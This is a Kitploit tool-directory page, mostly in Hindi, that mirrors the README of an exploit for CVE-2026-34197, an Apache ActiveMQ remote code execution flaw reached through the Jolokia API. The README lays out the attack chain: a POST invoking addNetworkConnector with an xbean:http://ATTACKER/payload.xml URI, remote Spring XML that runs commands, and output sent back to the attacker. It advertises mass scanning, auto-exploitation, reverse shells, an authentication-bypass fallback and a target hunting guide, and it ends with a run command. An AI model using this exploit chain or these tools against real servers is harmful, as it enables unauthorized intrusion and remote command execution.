Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-34197 — Apache ActiveMQ में Jolokia API के माध्यम से RCE (CVE-2026-34197) के लिए एक्सप्लॉइट, जिसमें कमांड आउटपुट कैप्चर, मास स्कैनिंग और ऑटो-एक्सप्लॉइटेशन शामिल है। | Kitploit
उपकरण/GitHubGitHub/kondordevsecuritycorp/cve-2026-34197
भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगलैब और अभ्यास
GitHubkondordevsecuritycorp/cve-2026-34197

CVE-2026-34197

Apache ActiveMQ में Jolokia API के माध्यम से RCE (CVE-2026-34197) के लिए एक्सप्लॉइट, जिसमें कमांड आउटपुट कैप्चर, मास स्कैनिंग और ऑटो-एक्सप्लॉइटेशन शामिल है।

रिपॉजिटरी देखें
21155 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-34197 CVSS 9.8 RCE Python 3.8+

Apache ActiveMQ Jolokia Spring

CVE-2026-34197

Jolokia API के माध्यम से Apache ActiveMQ रिमोट कोड निष्पादन

Author Stars Forks Issues License

अवलोकन • विवरण • हमले का प्रवाह • त्वरित आरंभ • ATTACKER_IP गाइड • उपयोग • आउटपुट कैप्चर • स्कैनर • खोज • पहचान • सुधार


अवलोकन

CVE-2026-34197 Apache ActiveMQ Classic में एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है, जो एक प्रमाणित हमलावर को वेब कंसोल पर उजागर Jolokia API के माध्यम से मनमाने ऑपरेटिंग सिस्टम कमांड निष्पादित करने की अनुमति देती है।

यह भेद्यता 13 वर्षों से अधिक समय से मौजूद है और Jolokia (HTTP-JMX ब्रिज), ActiveMQ MBeans, नेटवर्क कनेक्टर और VM ट्रांसपोर्ट के बीच परस्पर क्रिया में निहित है।

[!CAUTION] यह KONDOR DEV SECURITY द्वारा विकसित पहला सार्वजनिक PoC है। केवल अधिकृत सुरक्षा मूल्यांकन में उपयोग करें।

मुख्य विशेषताएं

  • कमांड आउटपुट कैप्चर — सरल कमांड (id, whoami, cat /etc/passwd) स्वचालित रूप से आपके टर्मिनल में अपना आउटपुट प्रदर्शित करते हैं
  • स्वचालित base64 रैपिंग — रिवर्स शेल और विशेष वर्ण बिना मैन्युअल एस्केपिंग के काम करते हैं
  • 2-चरणीय स्कैनर (version_check.py) — मल्टीथ्रेडेड संस्करण पहचान + लक्षित शोषण
  • प्रमाणीकरण फ़ॉलबैक — क्रेडेंशियल विफल होने पर स्वचालित रूप से no-auth आज़माता है (CVE-2024-32114)
  • स्मार्ट ब्रोकर पहचान — Jolokia वाइल्डकार्ड क्वेरी के माध्यम से ब्रोकर नाम का स्वचालित पता लगाता है

भेद्यता विवरण

CVE IDCVE-2026-34197
गंभीरता CVSS 3.1
प्रकाररिमोट कोड निष्पादन (RCE)
CWECWE-20 (अनुचित इनपुट सत्यापन) / CWE-94 (कोड इंजेक्शन)
प्रभावितActiveMQ Classic < 5.19.4 और 6.0.0 — 6.2.2
पैच किया गया5.19.4 / 6.2.3
प्रमाणीकरण आवश्यकहाँ (डिफ़ॉल्ट क्रेडेंशियल admin:admin सामान्य हैं)
No Auth आवश्यक नहीं6.0.0 — 6.1.1 (CVE-2024-32114 के कारण)
डिफ़ॉल्ट पोर्ट8161 (वेब कंसोल)

हमले का प्रवाह```

                CVE-2026-34197 — Exploitation Chain

──────────────────────────────────────────────────────────────

ATTACKER ACTIVEMQ SERVER ──────── ─────────────── │ │ [1] │── POST /api/jolokia/ ──────────────────>│ │ addNetworkConnector( │ │ vm://rce?brokerConfig= │ │ xbean:http://ATTACKER/payload.xml) │ │ │ │ [2] │── Creates VM broker │ │── Fetches remote XML │ │ [3] │<── GET /payload.xml ─────────────────────│ │── Serves malicious Spring XML ─────────>│ │ │ │ [4] │── Spring instantiates beans │ │── Runtime.exec(COMMAND) │ │── ** RCE ACHIEVED ** │ │ [5] │<── POST /output (command stdout) ────────│ (auto, for simple commands) │── Displays command output │ │ │

### चरण-दर-चरण विवरण

| चरण | क्रिया | घटक |
|:----:|--------|-----------|
| **1** | हमलावर Broker MBean पर `addNetworkConnector` को आमंत्रित करते हुए `/api/jolokia/` पर POST भेजता है | Jolokia API |
| **2** | ActiveMQ `vm://` ट्रांसपोर्ट URI को संसाधित करता है और `brokerConfig` को दूरस्थ URL की ओर इंगित करते हुए एक अस्थायी broker बनाता है | VM Transport |
| **3** | `xbean:` स्कीम हमलावर के सर्वर से Spring XML कॉन्फ़िगरेशन फ़ाइल का डाउनलोड ट्रिगर करती है | Spring / XBean |
| **4** | Spring XML में सभी beans को इंस्टैंशिएट करता है, जिसमें वह भी शामिल है जो `Runtime.getRuntime().exec()` को कॉल करता है | Spring Context |
| **5** | सरल कमांड के लिए, आउटपुट कैप्चर किया जाता है और HTTP POST के माध्यम से हमलावर के लिसनर को वापस भेजा जाता है (स्वचालित) | Output Capture |

---

## प्रोजेक्ट संरचना```
CVE-2026-34197/
├── exploit.py             # PoC exploit (single target + mass scan)
├── version_check.py       # Scanner + Auto-Exploit (2-phase pipeline)
├── payloads/
│   └── template.xml       # Spring XML payload template
├── targets.txt            # Target URLs (one per line)
├── docker/
│   └── docker-compose.yml # Vulnerable lab environment
├── docs/
│   ├── HUNTING_GUIDE_EN.md  # Target hunting guide (English)
│   └── HUNTING_GUIDE_ES.md  # Guía de búsqueda (Español)
├── LICENSE
└── README.md

त्वरित आरंभ

पूर्वापेक्षाएँ```bash

Python 3.8+ required

pip install requests

### लैब वातावरण (Docker)```bash
cd docker
docker-compose up -d
# ActiveMQ Classic 5.18.6 (vulnerable) → localhost:8161

एक्सप्लॉइट चलाएँ```bash

Single target

python exploit.py -t http://TARGET:8161 -l YOUR_IP -c "id"

टूल डाउनलोड करें